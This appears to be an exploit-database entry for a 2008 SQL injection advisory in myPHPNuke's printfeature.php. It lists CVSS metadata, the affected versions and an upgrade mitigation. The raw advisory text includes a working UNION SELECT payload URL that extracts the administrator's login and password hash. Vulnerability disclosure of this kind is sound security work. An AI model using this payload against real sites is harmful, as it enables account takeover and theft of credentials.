SQL Injection vulnerability in myPHPNuke

vendor:

myPHPNuke

by:

MustLive

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: myPHPNuke

Affected Version From: myPHPNuke < 1.8.8_8rc2

Affected Version To: myPHPNuke < 1.8.8_8rc2

Patch Exists: YES

Related CWE: N/A

CPE: a:myphpnuke:myphpnuke

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SQL Injection vulnerability in myPHPNuke

There is SQL Injection vulnerability in printfeature.php in myPHPNuke. With this query you will receive login and password (hash) of administrator. Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to this attack. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).

Mitigation:

Upgrade to the latest version of myPHPNuke

Source

Exploit-DB raw data:

############################################################

SQL Injection vulnerability in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2398/

Description: There is SQL Injection vulnerability in printfeature.php in
myPHPNuke.

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the
additional filters were added, so it is not vulnerable to this attack. But
version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
Injection attack is possible (without using spaces and brackets).

############################################################

# milw0rm.com [2008-09-02]